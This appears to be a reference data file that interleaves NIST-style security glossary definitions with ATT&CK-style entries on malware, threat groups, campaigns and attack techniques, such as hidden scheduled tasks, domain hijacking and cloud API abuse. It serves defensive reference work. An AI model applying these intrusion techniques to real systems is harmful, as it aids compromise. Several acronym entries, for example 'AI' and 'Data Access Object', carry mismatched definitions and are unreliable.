Definition: “Business areas” separate government operations into high-level categories relating to the purpose of government, the mechanisms the government uses to achieve its purposes, the support functions necessary to conduct government operations, and resource management functions that support all areas of the government’s business. “Business areas” are subdivided into “areas of operation” or “lines of business.” The recommended information types provided in NIST SP 800-60 are established from the “business areas” and “lines of business” from OMB’s Business Reference Model (BRM) section of Federal Enterprise Architecture (FEA) Consolidated Reference Model Document Version 2.3

Term: system of records notice
Definition: The notice(s) published by an agency in the Federal Register upon the establishment and/or modification of a system of records describing the existence and character of the system.

Term: penetration testing
Definition: A test methodology in which assessors, typically working under specific constraints, attempt to circumvent or defeat the security features of an information system.

Term: sanitization
Definition: To render access to target data on the media infeasible for a given level of effort.

Term: Executive Office of the President
Definition: The President's immediate staff, along with entities such as the Office of Management and Budget, the National Security Staff, the Office of Science and Technology Policy, and the Office of Personnel Management.

Term: security categorization
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in CNSSI No.1253 for national security systems and in FIPS 199 for other than national security systems.

Term: adj-RIB-In
Definition: Routes learned from inbound update messages from BGP peers.

Term: Digital Fingerprint
Definition: A digital signature that uniquely identifes data and has the property that changing a single bit in the data will cause a completely different message diges to be generated.

Term: CKMS module
Definition: A device that performs a set of key and metadata-management functions for at least one CKMS.

Term: risk analysis
Definition: The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system. A part of risk management incorporates threat and vulnerability analyses, and considers mitigations provided by security controls planned or in place.

Term: V&amp;V
Definition: The process of determining whether the requirements for a system or component are complete and correct, the products of each development phase fulfill the requirements or conditions imposed by the previous phase, and the final system or component complies with specified requirements.

Name: Goopy
Type: malware
Description: Goopy is a Windows backdoor and Trojan used by APT32 and shares several similarities to another backdoor used by the group (Denis). Goopy is named for its impersonation of the legitimate Google Updater executable.

Term: assurance
Definition: Grounds for justified confidence that a [security or privacy] claim has been or will be achieved. Note 1: Assurance is typically obtained relative to a set of specific claims. The scope and focus of such claims may vary (e.g., security claims, safety claims), and the claims themselves may be interrelated. Note 2: Assurance is obtained through techniques and methods that generate credible evidence to substantiate claims.

Term: Disinfecting
Definition: Removing malware from within a file.

Term: NC
Definition: A value that is used only once within a specified context.

Name: Data Staged
Type: attack-pattern
Description: Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may Create Cloud Instance and stage data in that instance.

Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.

Name: QuasarRAT
Type: tool
Description: QuasarRAT is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. QuasarRAT is developed in the C# language.

Term: authenticator binding
Definition: The establishment of an association between a specific authenticator and a subscriber account that allows the authenticator to authenticate the subscriber associated with the account, possibly in conjunction with other authenticators.

Term: Packet
Definition: The logical unit of network communications produced by the transport layer.

Term: Provable prime
Definition: An integer that is either constructed to be prime or is demonstrated to be prime using a primality-proving algorithm.

Term: security categorization
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS Publication 199 for other than national security systems.

Name: Domains
Type: attack-pattern
Description: Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant. Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).

Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.

Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.

Term: dual authorization
Definition: The system of storage and handling designed to prohibit individual access to certain resources by requiring the presence and actions of at least two authorized persons, each capable of detecting incorrect or unauthorized security procedures with respect to the task being performed.

Term: assertion
Definition: A verifiable statement from an IdP to an RP that contains information about an end user. Assertions may also contain information about the end user’s authentication event at the IdP.

Term: Domain Name Server
Definition: The internet's equivalent of a phone book. It maintains a directory of domain names, as defined by the Domain Name System, and translates them to Internet Protocol addresses.

Term: hash function
Definition: A (mathematical) function that maps values from a large (possibly very large) domain into a smaller range. The function satisfies the following properties: 1. (One-way) It is computationally infeasible to find any input that maps to any pre-specified output; 2. (Collision free) It is computationally infeasible to find any two distinct inputs that map to the same output.

Term: Data Management Officer
Definition: An official responsible for overviewing and carrying out the data management tasks of research projects. Main duties and responsibilities include data collection or the formulation, implementation, and enforcement of proper data collection policies and procedures. Trains reporting agencies on data collection tools and equipment.

Term: CI
Definition: An item or aggregation of hardware or software or both that is designed to be managed as a single entity. Configuration items may vary widely in complexity, size and type, ranging from an entire system including all hardware, software and documentation, to a single module, a minor hardware component or a single software package.

Term: passive attack
Definition: An attack that does not alter systems or data.

Term: reconstitution
Definition: Follows recovery operations during contingency plan execution. Includes activities to return organizational systems to fully operational states; the deactivation of any interim system capabilities needed during recovery operations; assessments of fully restored system capabilities; reestablishment of continuous monitoring activities; potential system reauthorizations, and activities to prepare the systems against future disruptions, compromises, or failures.

Term: Container
Definition: A method for packaging and securely running an application within an application virtualization environment. Also known as an application container or a server application container.

Term: AML
Definition: Attacks that exploit the statistical, data-based nature of ma­chine learning systems.

Term: authentication assurance level
Definition: A category that describes the strength of the authentication process.

Term: CC
Definition: Governing document that provides a comprehensive, rigorous method for specifying security function and assurance requirements for products and systems.

Term: Access Control Model
Definition: Formal presentations of the security policies enforced by AC systems, and are useful for proving theoretical limitations of systems. AC models bridge the gap in abstraction between policy and mechanism.

Term: information security policy
Definition: Aggregate of directives, regulations, and rules that prescribe how an organization manages, protects, and distributes information.

Term: Trusted Party
Definition: A party that is trusted by its clients to generate cryptographic keys.

Term: CA
Definition: Operations performed in defeating cryptographic protection without an initial knowledge of the key employed in providing the protection.

Term: cybersecurity framework category
Definition: The subdivision of a Function into groups of cybersecurity outcomes, closely tied to programmatic needs and particular activities.

Term: Metadata (explicit)
Definition: Parameters used to describe the properties associated with a cryptographic key that are explicitly recorded, managed, and protected by the CKMS.

Term: Sandbox
Definition: A system that allows an untrusted application to run in a highly controlled environment where the application’s permissions are restricted to an essential set of computer permissions. In particular, an application in a sandbox is usually restricted from accessing the file system or the network. A widely used example of applications running inside a sandbox is a Java applet.

Name: Trojan.Mebromi
Type: malware
Description: Trojan.Mebromi is BIOS-level malware that takes control of the victim before MBR.

Term: Secure channel
Definition: A path for transferring data between two entities or components that ensures confidentiality, integrity and replay protection, as well as mutual authentication between the entities or components. The secure channel may be provided using cryptographic, physical or procedural methods, or a combination thereof.

Name: Account Discovery
Type: attack-pattern
Description: Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts).

Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.

For examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default PowerShell and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.

Term: VRF
Definition: Process of producing objective evidence that sufficiently demonstrates that the system satisfies its security requirements and security characteristics with the level of assurance that applies to the system.

Term: encryption key
Definition: A cryptographic key that is used with a PKE in order to encrypt plaintexts into ciphertexts. The encryption key can be made public.

Term: Key-pair owner
Definition: The entity that is authorized to use the private key associated with a public key, whether that entity generated the key pair itself or a trusted party generated the key pair for the entity.

Term: SAP
Definition: A program established for a specific class of classified information that imposes safeguarding and access requirements that exceed those normally required for information at the same classification level.

Term: security control baseline
Definition: The set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system. See also control baseline.

Term: Scheme
Definition: A set of unambiguously specified transformations that provide a (cryptographic) service when properly implemented and maintained. A scheme is a higher-level construct than a primitive and a lower-level construct than a protocol.

Term: DH
Definition: The (non-cofactor) FFC Diffie-Hellman key-agreement primitive.

Term: TTP
Definition: An entity other than the key pair owner and the verifier that is trusted by the owner, the verifier, or both. Sometimes shortened to “trusted party.”

Term: Import
Definition: A process available to end users by which an SCAP source data stream can be loaded into the vendor’s product. During this process, the vendor process may optionally translate this file into a proprietary format.

Name: Scheduled Task
Type: attack-pattern
Description: Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and Windows Management Instrumentation (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to System Binary Proxy Execution, adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.

Adversaries may also create "hidden" scheduled tasks (i.e. Hide Artifacts) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions). Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.

Term: ongoing assessment and authorization
Definition: The continuous evaluation of the effectiveness of security control implementation; it is not separate from ISCM but in fact is a subset of ISCM activities.

Term: key management
Definition: The activities involving the handling of cryptographic keys and other related security parameters (e.g., passwords) during the entire lifecycle of the keys, including their generation, storage, establishment, entry and output, use and destruction.

Term: mandatory access control (MAC)
Definition: A means of restricting access to objects based on the sensitivity (as represented by a security label) of the information contained in the objects and the formal authorization (i.e., clearance, formal access approvals, and need-to-know) of subjects to access information of such sensitivity. Mandatory Access Control is a type of nondiscretionary access control.

Name: ShimRatReporter
Type: tool
Description: ShimRatReporter is a tool used by suspected Chinese adversary Mofang to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as ShimRat) as well as set up faux infrastructure which mimics the adversary's targets. ShimRatReporter has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.

Name: Medusa Ransomware
Type: malware
Description: Medusa Ransomware has been utilized in attacks since at least 2021. Medusa Ransomware has been known to be utilized in conjunction with living off the land techniques and remote management software. Medusa Ransomware has been used in campaigns associated with “double extortion” ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Medusa Ransomware software was initially a closed ransomware variant which later evolved to a Ransomware as a Service (RaaS). Medusa Ransomware has impacted victims from a diverse range of sectors within a multitude of countries, and it is assessed Medusa Ransomware is used in an opportunistic manner.

Term: Hard fork
Definition: A change to a blockchain implementation that is not backwards compatible. Non-updated nodes cannot continue to transact with updated nodes.

Name: Winnti for Windows
Type: malware
Description: Winnti for Windows is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, Winnti Group.. The Linux variant is tracked separately under Winnti for Linux.

Term: HSN
Definition: An integrated terrestrial and space infrastructure comprised of independently owned and operated segments, parts, or systems that collectively create or perform as a singular space system.

Term: Feature Phone
Definition: A mobile device that primarily provide users with simple voice and text messaging services.

Term: re-key (a certificate)
Definition: To change the value of a cryptographic key that is being used in a cryptographic system application; this normally entails issuing a new certificate on the new public key.

Term: Removable User Identity Module (R-UIM)
Definition: A card developed for cdmaOne/CDMA2000 handsets that extends the GSM SIM card to CDMA phones and networks.

Term: HIPAA
Definition: the primary law in the United States that governs the privacy of healthcare information

Term: information system boundary
Definition: See Authorization Boundary.

Name: Account Manipulation
Type: attack-pattern
Description: Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. 

In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged Valid Accounts.

Term: UMTS
Definition: a third-generation (3G) mobile phone technologies standardized by the 3GPP as the successor to GSM.

Term: <em>TMacTagBits(X)</em>
Definition: A truncation function that outputs the most significant (i.e., leftmost) MacTagBits bits of the input string, X, when the bit length of X is greater than MacTagBits; otherwise, the function outputs X. For example, T2(1011)=10, T3(1011)=101, and T4(1011)=1011.

Term: logic bomb
Definition: A piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met.

Term: Federation Administrators
Definition: The entity responsible for the governance and administration of an identity federation.

Name: Audio Capture
Type: attack-pattern
Description: An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.

Term: trusted referee
Definition: An agent of the CSP who is trained to make risk-based decisions regarding an applicant’s identity proofing case when that applicant is unable to meet the expected requirements of a defined IAL proofing process.

Term: Issuance
Definition: Agreeing on the type of token that will be used for future authentication

Term: privacy control assessment
Definition: See security control assessment or risk assessment.

Term: life cycle
Definition: Evolution of a system, product, service, project, or other human-made entity from conception through retirement.

Term: block cipher mode of operation
Definition: An algorithm for the cryptographic transformation of data that is based on a block cipher.

Term: depth
Definition: The amount of detail covered by an assessment: basic (both critical and non-critical elements) or detailed (all elements).

Term: nonlocal maintenance
Definition: Maintenance activities conducted by individuals who communicate through either an internal or external network.

Term: AI
Definition: SCAP constructs to uniquely identify assets (components) based on known identifiers and/or known information about the assets.

Term: Awareness
Definition: a learning process that sets the stage for training by changing individual andorganizational attitudes to realize the importance of security and the adverse consequences of its failure.

Term: authenticate
Definition: A process that establishes the source of information, provides assurance of an entity’s identity or provides assurance of the integrity of communications sessions, messages, documents or stored data.

Name: C0018
Type: campaign
Description: C0018 was a month-long ransomware intrusion that successfully deployed AvosLocker onto a compromised network. The unidentified actors gained initial access to the victim network through an exposed server and used a variety of open-source tools prior to executing AvosLocker.

Term: security control
Definition: A protection measure for a system.

Name: NativeZone
Type: malware
Description: NativeZone is the name given collectively to disposable custom Cobalt Strike loaders used by APT29 since at least 2021.

Term: Secure Hash Algorithm
Definition: A hash algorithm with the property that it is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest.

Term: Consuming Application
Definition: The application (including middleware) that uses random numbers or bits obtained from an approved random bit generator.

Term: encryption
Definition: The process of a confidentiality mode that transforms usable data into an unreadable form.

Term: NIST Special Publication
Definition: A type of publication issued by NIST. Specifically, the SP 800-series reports on the Information Technology Laboratory’s research, guidelines, and outreach efforts in computer security, and its collaborative activities with industry, government, and academic organizations.

Term: Elliptic Curve Cryptography
Definition: Elliptic Curve Cryptography, the public-key cryptographic methods using operations in an elliptic curve group.

Term: Random Variable
Definition: Random variables differ from the usual deterministic variables (of science and engineering) in that random variables allow the systematic distributional assignment of probability values to each possible outcome.

Term: Open Checklist Interactive Language (OCIL)
Definition: SCAP language for expressing security checks that cannot be evaluated without some human interaction or feedback.

Term: <em><strong>rightmost (V, a)</strong></em>
Definition: The rightmost a bits of V.

Term: systems security engineering
Definition: A specialty engineering field strongly related to systems engineering. It applies scientific, engineering, and information assurance principles to deliver trustworthy systems that satisfy stakeholder requirements within their established risk tolerance.

Term: P-value
Definition: The probability (under the null hypothesis of randomness) that the chosen test statistic will assume values that are equal to or worse than the observed test statistic value when considering the null hypothesis. The P-valueis frequently called the “tail probability.”

Term: authenticate
Definition: The process of proving the claimed identity of an individual user, machine, software component or any other entity.  Typical authentication mechanisms include conventional password schemes, biometrics devices, cryptographic methods, and onetime passwords (usually implemented with token based cards.)

Term: Control Algorithm
Definition: A mathematical representation of the control action to be performed.

Term: single point keying (SPK)
Definition: Means of distributing key to multiple, local crypto equipment or devices from a single fill point.

Term: encapsulation key
Definition: A cryptographic key produced by a KEM during key generation and used by the encapsulation algorithm.

Term: Data Access Object
Definition: Designated Authorizing Official; A senior organization official that has been given the authorization to authorize the reliability of an issuer.

Term: RNG seed
Definition: A seed that is used to initialize a deterministic random bit generator. Also called an RBG seed.

Term: non-deterministic noise
Definition: a random value that cannot be predicted

Name: KV Botnet Activity
Type: campaign
Description: KV Botnet Activity consisted of exploitation of primarily “end-of-life” small office-home office (SOHO) equipment from manufacturers such as Cisco, NETGEAR, and DrayTek. KV Botnet Activity was used by Volt Typhoon to obfuscate connectivity to victims in multiple critical infrastructure segments, including energy and telecommunication companies and entities based on the US territory of Guam. While the KV Botnet is the most prominent element of this campaign, it overlaps with another botnet cluster referred to as the JDY cluster. This botnet was disrupted by US law enforcement entities in early 2024 after periods of activity from October 2022 through January 2024.

Term: dominance rule
Definition: A cell is regarded as confidential, if the n largest units contribute more than k % to the cell total, e.g., n=2 and k=85 means that a cell is defined as risky if the two largest units contribute more than 85 % to the cell total. The n and k are given by the statistical authority. In some NSOs [national statistical office] the values of n and k are confidential.

Term: Security Features Users Guide
Definition: Guide or manual explaining how the security mechanisms in a specific system work.

Name: Amadey
Type: malware
Description: Amadey is a Trojan bot that has been used since at least October 2018.

Term: CI
Definition: An aggregation of information system components that is designated for configuration management and treated as a single entity in the configuration management process.

Term: False Positive
Definition: An instance in which a security tool incorrectly classifies benign content as malicious.

Term: RA
Definition: The process of identifying the risks to system security and determining the probability of occurrence, the resulting impact, and additional safeguards that would mitigate this impact. Part of Risk Management and synonymous with Risk Analysis.

Name: ZIRCONIUM
Type: intrusion-set
Description: ZIRCONIUM is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.

Term: questionnaire
Definition: A sequence of questions to be used in determining a state or condition.

Name: AutoIt backdoor
Type: malware
Description: AutoIt backdoor is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.

Term: scoping considerations
Definition: A part of tailoring guidance that provides organizations with specific considerations on the applicability and implementation of security and privacy controls in the control baselines. Considerations include policy or regulatory, technology, physical infrastructure, system component allocation, public access, scalability, common control, operational or environmental, and security objective.

Term: Quantitative Risk Analysis
Definition: A method for risk analysis where numerical values are assigned to both impact and likelihood based on statistical probabilities and monetarized valuation of loss or gain.

Term: cyber resiliency concept
Definition: A concept related to the problem domain and/or solution set for cyber resiliency. Cyber resiliency concepts are represented I ncyber resiliency risk models as well as by cyber resiliency constructs.

Term: federal agency
Definition: An executive department specified in 5 U.S.C., Sec. 105; a military department specified in 5 U.S.C., Sec. 102; an independent establishment as defined in 5 U.S.C., Sec. 104(1); and a wholly owned Government corporation fully subject to the provisions of 31 U.S.C., Chapter 91.

Term: confidentiality, integrity, availability
Definition: C = Confidentiality assurance, I = Integrity assurance, A = Availability assurance

Term: risk framing
Definition: The set of assumptions, constraints, risk tolerances, and priorities/trade-offs that shape an organization’s approach for managing risk

Term: security control inheritance
Definition: A situation in which an information system or application receives protection from security controls (or portions of security controls) that are developed, implemented, and assessed, authorized, and monitored by entities other than those responsible for the system or application; entities either internal or external to the organization where the system or application resides. See common control.

Term: SHA-256
Definition: The SHA-256 hash for the resource.

Term: <em>ICV3</em>
Definition: The 32-bit default ICV for TKW:0xA6A6A6A6.

Term: Profile augmentations
Definition: The properties or characteristics that are recommended, but not required, by this Profile for FCKMSs.

Term: bounded differential privacy
Definition: A unit of privacy variant that calls two datasets <em>D</em><sub>1</sub> and <i>D</i><sub>2</sub> neighbors if it is possible to construct <i>D</i><sub>2</sub> from <i>D</i><sub>1</sub> by changing one person’s data. Under bounded differential privacy, neighboring datasets have the same size. Bounded differential privacy allows for mechanisms that release the total size of the dataset with no noise.

Term: DP
Definition: Access control rules that compile directly into machine executable codes or signals. Subject/object attributes, operations, and environment conditions are the fundamental elements of digital policy, the building blocks of digital policy rules, which are enforced by an access control mechanism.

Term: network bootstrapping credentials
Definition: Credentials that a device needs in order to establish communications with and be authenticated by the network onboarding component. Device bootstrapping credentials are typically installed on the device during manufacturing, and they must already be on the device before it initiates the network-layer onboarding process. The device bootstrapping credentials are authoritative credentials that are unique to the device and independent of context; they are sometimes referred to as the device birth certificate. The device bootstrapping credentials always include some sort of secret (e.g., a private or secret pre-shared key), which the device will use to authenticate itself to the network onboarding component and to establish a secure communications channel with the network onboarding component.

Term: cyberspace attack
Definition: Cyberspace actions that create various direct denial effects (i.e. degradation, disruption, or destruction) and manipulation that leads to denial that is hidden or that manifests in the physical domains.

Name: Crimson
Type: malware
Description: Crimson is a remote access Trojan that has been used by Transparent Tribe since at least 2016.

Term: accreditation
Definition: also known as authorize processing (OMB Circular A-130, Appendix III),and approval to operate. Accreditation (or authorization to process information) is granted by a management official and provides an important quality control. By accrediting a system or application, a manager accepts the associated risk. Accreditation (authorization) must be based on a review of controls. (See Certification.)

Term: attribute
Definition: A distinct characteristic of an object often specified in terms of their physical traits, such as size, shape, weight, and color, etc., for real -world objects. Objects in cyberspace might have attributes describing size, type of encoding, network address, etc.

Term: <em>mgfSeed</em>
Definition: String from which a mask is derived; a byte string.

Term: Log Compression
Definition: Storing a log file in a way that reduces the amount of storage space needed for the file without altering the meaning of its contents.

Term: Global Positioning System
Definition: The Global Positioning System (GPS) is a U.S.-owned utility that provides users with positioning, navigation, and timing (PNT) services. This system consists of three segments: the space segment, the control segment, and the user segment. The U.S. Space Force develops, maintains, and operates the space and control segments.

Term: information system security plan
Definition: A document that describes how an organization meets or plans to meet the security requirements for a system. In particular, the system security plan describes the system boundary, the environment in which the system operates, how security requirements are implemented, and the relationships with or connections to other systems.

Name: Cloud API
Type: attack-pattern
Description: Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, PowerShell modules like Azure for PowerShell, or software developer kits (SDKs) available for languages such as Python. 

Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.

With proper permissions (often via use of credentials such as Application Access Token and Web Session Cookie), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.

Term: Specialized Security-Limited Functionality (SSLF) Environment
Definition: Environment encompassing systems with specialized security requirements, in which higher security needs typically result in more limited functionality.

Term: Cradle
Definition: A docking station, which creates an interface between a user’s PC and PDA, and enables communication and battery recharging.

Term: Cybersecurity Incident
Definition: An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of a system or the information the system processes, stores, or transmits or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies.

Name: Reduce Key Space
Type: attack-pattern
Description: Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.

Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.

Adversaries may modify the key size used and other encryption parameters using specialized commands in a Network Device CLI introduced to the system through Modify System Image to change the configuration of the device.

Name: Update Software
Type: course-of-action
Description: Software updates ensure systems are protected against known vulnerabilities by applying patches and upgrades provided by vendors. Regular updates reduce the attack surface and prevent adversaries from exploiting known security gaps. This includes patching operating systems, applications, drivers, and firmware. This mitigation can be implemented through the following measures:

Regular Operating System Updates

- Implementation: Apply the latest Windows security updates monthly using WSUS (Windows Server Update Services) or a similar patch management solution. Configure systems to check for updates automatically and schedule reboots during maintenance windows.
- Use Case: Prevents exploitation of OS vulnerabilities such as privilege escalation or remote code execution.

Application Patching

- Implementation: Monitor Apache's update release notes for security patches addressing vulnerabilities. Schedule updates for off-peak hours to avoid downtime while maintaining security compliance.
- Use Case: Prevents exploitation of web application vulnerabilities, such as those leading to unauthorized access or data breaches.

Firmware Updates

- Implementation: Regularly check the vendor’s website for firmware updates addressing vulnerabilities. Plan for update deployment during scheduled maintenance to minimize business disruption.
- Use Case: Protects against vulnerabilities that adversaries could exploit to gain access to network devices or inject malicious traffic.

Emergency Patch Deployment

- Implementation: Use the emergency patch deployment feature of the organization's patch management tool to apply updates to all affected Exchange servers within 24 hours.
- Use Case: Reduces the risk of exploitation by rapidly addressing critical vulnerabilities.

Centralized Patch Management

- Implementation: Implement a centralized patch management system, such as SCCM or ManageEngine, to automate and track patch deployment across all environments. Generate regular compliance reports to ensure all systems are updated.
- Use Case: Streamlines patching processes and ensures no critical systems are missed.

*Tools for Implementation*

Patch Management Tools:

- WSUS: Manage and deploy Microsoft updates across the organization.
- ManageEngine Patch Manager Plus: Automate patch deployment for OS and third-party apps.
- Ansible: Automate updates across multiple platforms, including Linux and Windows.

Vulnerability Scanning Tools:

- OpenVAS: Open-source vulnerability scanning to identify missing patches.

Term: IPComp
Definition: Protocol used to perform lossless compression for packet payloads.

Term: FIPPs
Definition: a set of principles that have been developed world-wide since the 1970s that provide guidance to organizations in the handling of personal data

Term: information system security officer
Definition: See system security officer (SSO).

Term: CA
Definition: 1. Operations performed to defeat cryptographic protection without an initial knowledge of the key employed in providing the protection.

Term: authenticity
Definition: The property of being genuine and being able to be verified and trusted; confidence in the validity of a transmission, a message, or message originator.

Term: cryptographic key
Definition: A parameter that determines the operation of a cryptographic function, such as: 
1. The transformation from plaintext to ciphertext and vice versa, 
2. The generation of keying material, or 
3. A digital signature computation or verification.

Term: <em>RESULTn</em>
Definition: Block of data representing Plaintext n, if encryption state, or Ciphertext n, if decryption state

Term: Symmetric Card Authentication Key Authentication (SYM-CAK)
Definition: An authentication mechanism where the PIV Card is identified using the CHUID or another data element, and then the card responds to a challenge by signing the challenge value with the symmetric card authentication key. This mechanism is deprecated.

Term: Key de-registration
Definition: A function in the lifecycle of a cryptographic key; the marking of a key or the information associated with it (e.g., metadata) to indicate that the key is no longer in use.

Term: eXtendable-Output Function (XOF)
Definition: A function on bit strings in which the output can be extended to any desired length.

Term: Defense Discovery Metadata Standard (DDMS)
Definition: Defines discovery metadata elements for resources posted to community and organizational shared spaces throughout the DoD enterprise. Specifically DDMS defines a set of information fields that are to be used to describe any data or service asset that is made known to the enterprise.

Term: salt
Definition: As used in this Recommendation, a byte string (which may be secret or non-secret) that is used as a MAC key.

Term: <em>0x</em>
Definition: A string of x zero bits. For example, 05 = 00000.

Term: Memorandum of Understanding or Agreement
Definition: Used to document a mutual understanding between any two or more parties that does not contain an expectation of payment, and under which the parties do not rely on each other to execute or deliver on any responsibilities.

Term: design characteristics
Definition: Design attributes or distinguishing features that pertain to a measurable description of a product or service.

Term: PIV Credential
Definition: A credential that authoritatively binds an identity (and, optionally, additional attributes) to the authenticated cardholder that is issued, managed, and used in accordance with the PIV standards. These credentials include public key certificates stored on a PIV Card as well as other authenticators bound to a PIV identity account as derived PIV credentials.

Term: assertion
Definition: A statement from a verifier to an RP that contains information about a subscriber. Assertions may also contain verified attributes.

Term: Transport Layer Security (TLS)
Definition: An authentication and security protocol widely implemented in browsers and web servers. TLS is defined by [RFC 2246], [RFC 3546], and [RFC 5246]. TLS is similar to the older Secure Sockets Layer (SSL) protocol, and TLS 1.0 is effectively SSL version 3.1. NIST SP 800-52, Guidelines for the Selection and Use of Transport Layer Security (TLS) Implementations specifies how TLS is to be used in government applications.

Term: key
Definition: A parameter that determines the transformation from plaintext to ciphertext and vice versa. (A DEA key is a 64-bit parameter consisting of 56 independent bits and 8 parity bits). Multiple (1, 2 or 3) keys may be used in the Triple Data Encryption Algorithm.

Term: Informative References
Definition: Relationships between elements of two documents that are recorded in a NIST IR 8278A-compliant format and shared by the OLIR Catalog. There are three types of OLIRs: concept crosswalk, set theory relationship mapping, and supportive relationship mapping.

Term: computing environment
Definition: Workstation or server (host) and its operating system, peripherals, and applications.

Term: Message
Definition: The data that is signed.

Name: STARWHALE
Type: malware
Description: STARWHALE is Windows Script File (WSF) backdoor that has been used by MuddyWater, possibly since at least November 2021; there is also a STARWHALE variant written in Golang with similar capabilities. Security researchers have also noted the use of STARWHALE by UNC3313, which may be associated with MuddyWater.

Term: key
Definition: A value used to control cryptographic operations, such as decryption, encryption, signature generation, or signature verification.

Term: cryptographic key
Definition: A cryptographic key. In this document, keys generally refer to public key cryptography key pairs used for authentication of users and/or machines (using digital signatures). Examples include identity key and authorized keys. The SSH protocol also uses host keys that are used for authenticating SSH servers to SSH clients connecting them.

Term: Sender
Definition: The party that sends secret keying material to the receiver in a key-transport transaction. Contrast with receiver.

Name: Earth Lusca
Type: intrusion-set
Description: Earth Lusca is a suspected China-based cyber espionage group that has been active since at least April 2019. Earth Lusca has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some Earth Lusca operations may be financially motivated.

